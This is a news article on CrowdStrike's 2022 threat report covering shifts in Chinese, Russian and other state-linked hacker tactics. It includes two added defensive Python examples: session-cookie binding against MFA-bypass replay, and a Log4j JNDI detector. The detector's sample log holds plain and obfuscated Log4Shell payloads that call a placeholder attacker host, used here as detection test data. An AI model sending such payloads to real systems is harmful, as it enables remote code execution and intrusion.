How Chinese, Russian Threat Actors Changed Tactics in 2021
Cybersecurity Firm Analyzes Fresh Focus Areas, Activities of Adversaries
In 2021, there was a spike in cybercrime, from the exploitation of Log4j vulnerabilities to the increasing popularity of malware-free cyberattacks. The focus and tactics used by global threat actors also changed, according to cybersecurity company CrowdStrike.
Analyzing the workings of Chinese and Russian threat actors, the 2022 Global Threat Report says that while the Chinese, who are well known for their track record in vulnerability exploitation, weaponized vulnerabilities at scale to facilitate initial access, the Russians primarily targeted IT and cloud service providers in 2021.
China's Evolving Capabilities
Chinese threat actors that CrowdStrike calls PANDA have been deploying exploits for new vulnerabilities at a "significantly elevated rate," according to the report (see: Report: China to Target Encrypted Data as Quantum Advances).
The threat actors exploited 12 new vulnerabilities affecting nine different products in 2021. The company did not specify the vulnerabilities or the affected products and the extent of the damage could not be immediately ascertained.
Analyzing the shift in exploitation methods, CrowdStrike's report shows that previously, Chinese threat actors relied on exploits that required user interaction, such as opening malicious documents and attachments in email, or visiting websites hosting malicious code. But in 2021, the Chinese adversaries exploited vulnerabilities in internet-facing devices or services. According to CrowdStrike's data, there has been an 83.3% increase in Chinese threat actors exploiting published vulnerabilities. The number rose from just two in 2020 to 12 in 2021.
China has always been, and will likely continue to be, a major player among nation-state adversaries, Scott Jarkoff, director of the strategic threat advisory group at CrowdStrike, tells Information Security Media Group.
He attributes the success of Chinese threat actors to the country building its own domestic capabilities. "To do that, they are - and have been for many years now - conducting operations to steal intellectual property. And I don't foresee that changing in the near future," Jarkoff says.
He says China is the adversary that is most widely targeting specific vulnerabilities as a way of conducting its attacks.
The U.S.-China Economic and Security Review Commission on Thursday addressed Chinese cybercrime groups' prowess in exploiting vulnerabilities as a cyberwarfare tactic. In its report on China’s cyber capabilities, the joint session, including Chinese and American experts, highlighted how the country's robust vulnerability research ecosystem was a strategic advantage.
While adversaries from other countries use credentials purchased from underground criminal forums for initial access, Jarkoff says Chinese threat actors exploit public-facing sites that allow them to access a targeted network.
The Chinese threat groups that CrowdStrike tracks are mostly after intellectual property in a particular company, he says, as opposed to Russian groups that target critical infrastructure.
But although Chinese adversaries are primarily focused on stealing intellectual property - organizational R&D data or foreign intelligence - they are also known to target critical infrastructure industries, Jarkoff says.
"We see Chinese adversaries focusing on the telecom industry as it has a lot of data, and it's also a great way to conduct surveillance and carry out intelligence collection."
An article in The Diplomat shows how China's legal system facilitates intellectual property theft as the country's IP laws and corruption in the courts make IP prosecution "nearly impossible."
Russian Threat Actors and the REvil Takedown
Russian threat actors target critical infrastructure as a show of force to demonstrate their capabilities, Jarkoff says, as in the 2016 attack on Ukrainian power grids, which affected around 1.4 million Ukrainian citizens. Chinese adversaries, on the other hand, lay low to focus on surveillance and data theft, he says.
According to CrowdStrike's report, Fancy Bear, a prominent Russian threat group, is associated with the country's Main Intelligence Directorate - or GRU. Following the U.S. Department of Justice's 2018 report of GRU officials working with international hacking and disinformation operations, the group has decreased its use of malware and switched to credential-harvesting tactics, the report says.
Another prominent Russian threat group, Cozy Bear, proved its post-exploitation prowess through lateral movement within cloud environments, the CrowdStrike report says. The group uses authentication cookie theft to bypass multifactor authentication restrictions.
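The cookie-theft technique described above works because a stolen session cookie is presented after MFA has already been satisfied, so the server sees a valid, MFA-verified session. The following is an added defensive example, not code from CrowdStrike or from the report: it binds each session to the client context it was issued in (a hash of the User-Agent and the client's network prefix) and flags a session token that later arrives from a different context, so that the reuse of a stolen cookie can trigger a step-up check or a forced re-login. The session store, token format and the `/24` and `/64` prefix widths are assumptions for illustration.

```python
import hashlib
import ipaddress
import secrets
from dataclasses import dataclass

# Hypothetical in-memory session store: token -> Session (constructed for this example).
SESSIONS: dict[str, "Session"] = {}


@dataclass
class Session:
    user: str
    ua_hash: str       # hash of the User-Agent the session was issued to
    ip_prefix: str     # network prefix the session was issued from
    mfa_verified: bool


def fingerprint_ua(user_agent: str) -> str:
    """Stable, non-reversible fingerprint of the User-Agent string."""
    return hashlib.sha256(user_agent.encode()).hexdigest()[:16]


def network_prefix(client_ip: str) -> str:
    """Coarse network location: /24 for IPv4, /64 for IPv6 (assumed widths)."""
    addr = ipaddress.ip_address(client_ip)
    width = 24 if addr.version == 4 else 64
    return str(ipaddress.ip_network(f"{client_ip}/{width}", strict=False))


def create_session(user: str, client_ip: str, user_agent: str,
                   mfa_verified: bool = True) -> str:
    """Issue a random session token bound to the issuing client's context."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = Session(user, fingerprint_ua(user_agent),
                              network_prefix(client_ip), mfa_verified)
    return token


def check_session(token: str, client_ip: str, user_agent: str) -> str:
    """Classify a presented session token against its issuing context.

    Returns one of: "unknown", "ok", "ua-mismatch", "ip-change".
    A mismatch is a signal for step-up authentication or session revocation;
    it should not be treated as proof of compromise on its own, since
    legitimate clients change networks far more often than browsers.
    """
    session = SESSIONS.get(token)
    if session is None:
        return "unknown"
    if session.ua_hash != fingerprint_ua(user_agent):
        return "ua-mismatch"
    if session.ip_prefix != network_prefix(client_ip):
        return "ip-change"
    return "ok"


def hardened_set_cookie(name: str, token: str) -> str:
    """Set-Cookie header that keeps the token off the network in clear text
    and out of reach of page scripts; it does not stop theft from an endpoint
    that is already compromised, which is why the binding check above exists."""
    return f"{name}={token}; Secure; HttpOnly; SameSite=Strict; Path=/"


if __name__ == "__main__":
    # Constructed scenario: a session issued to one client, then replayed from another.
    ua_victim = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/96.0"
    ua_other = "python-requests/2.27.1"
    tok = create_session("alice", "198.51.100.10", ua_victim)
    print(hardened_set_cookie("sid", tok))
    print(check_session(tok, "198.51.100.10", ua_victim))   # ok
    print(check_session(tok, "203.0.113.5", ua_other))      # ua-mismatch
    print(check_session(tok, "203.0.113.5", ua_victim))     # ip-change
```

The check is ordered so that a User-Agent mismatch, which is rare for a genuine client, is reported before a network change, which is common for laptops and phones; an application would typically revoke on the former and require a fresh MFA prompt on the latter.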
Russian threat group REvil has been on a roller coaster ride. In January 2022, the Federal Security Service of the Russian Federation said it had arrested 14 cybercriminals associated with the ransomware group and had seized more than $600,000 and 500,000 euros in cryptocurrency assets.
Jarkoff says of the arrests: "There is always going to be a sacrificial lamb, and it might be that the REvil ransomware group is that sacrificial lamb."
"My assessment is that it's likely those guys aren't sitting in jail somewhere in Russia. Chances are they're probably employed by the FSB. They might be conducting ransomware operations even now. [It's] just that they've been taken off the streets."
He predicts that members of the disbanded REvil group may be working for one of the Bear groups, or potentially even become a new Bear group. CrowdStrike refers to Russian threat actors as Bears (see: Suspected REvil Ransomware Spinoff 'Ransom Cartel' Debuts).
The CrowdStrike report also mentions the shift in focus for threat actors from other countries.
Iran has begun leveraging ransomware to blend disruptive operations with e-crime activities, the report says. Iran-linked adversaries have adopted the use of ransomware in addition to "lock-and-leak" disruptive information operations to target organizations in the U.S., Israel, the Middle East and North Africa, according to CrowdStrike.
And the Democratic People's Republic of Korea has turned to cryptocurrency-related activities to compensate for revenue lost as a result of the pandemic, the report says. The North Korean Chollima and Crane threat groups are included in CrowdStrike's list of nation-state adversaries.
CrowdStrike has also identified 21 newly named adversaries in its latest threat report, taking the total number of threat actors it tracks to more than 170. The new members on the list include "private sector offensive actors" - Israeli spyware makers the NSO Group and Candiru. Other threat actors added to the list are Turkey-based Wolf, Colombia-based Ocelots, and Prophet Spider, which is of unknown origin.
While CrowdStrike did not offer additional details on Wolf and Ocelots, it says the Prophet Spider threat group leverages Log4j exploits for credential harvesting and has already attempted this approach on an undisclosed cloud workspace service.
Jarkoff says the group uses the Log4j exploit to gain access into networks, and "it has been pretty successful for them." The group has previously attacked Oracle WebLogic to gain access to user environments.
The e-crime group, active since May 2017, has not been linked to any particular country so far.
While Jarkoff says that several other adversaries have also leveraged Log4j for their activities, "it's not to the same degree and velocity today as it was two months ago."
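The Log4j activity attributed to Prophet Spider and the other adversaries above depends on getting a `${jndi:...}` lookup string into a field the target application logs, and in-the-wild payloads routinely wrap it in Log4j's own nested lookups (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) to evade naive string matching. The following is an added detection example, not code from CrowdStrike or from the article: it resolves the common lookup obfuscations back to plain text and then scans log lines for a JNDI lookup. The sample access-log lines are constructed, and the `attacker.example` host is a placeholder.

```python
import re

# Innermost ${...} token: contains no nested "${" and no "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match: re.Match) -> str:
    """Resolve one innermost Log4j lookup the way the evasion tricks rely on."""
    body = match.group(1)
    low = body.lower()
    # ${lower:x} / ${upper:x} evaluate to x (case is normalized later).
    if low.startswith(("lower:", "upper:")):
        return body.split(":", 1)[1]
    # ${name:-default} evaluates to the default when the lookup fails,
    # which covers ${::-j} and ${env:NaN:-j}.
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Anything else (including the jndi: lookup itself) is left intact.
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def detect_jndi(line: str) -> bool:
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return "${jndi:" in normalize_lookups(line).lower()


def scan_log(lines: list[str]) -> list[tuple[int, str]]:
    """Return (line number, normalized line) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if detect_jndi(line):
            hits.append((number, normalize_lookups(line)))
    return hits


# Constructed sample web-server access log; no real hosts or payloads.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '203.0.113.10 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}"',
    '203.0.113.11 - - [10/Dec/2021:10:00:05 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, normalized in scan_log(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

Lines 2, 3 and 4 of the sample are flagged; line 5 contains a lookup but not a JNDI one, so it is reported only by the broader `${` presence a SIEM rule might also want to track. Because the normalization stops when nothing further resolves, an outer `${jndi:...}` wrapped around an unknown lookup is still caught by the substring check.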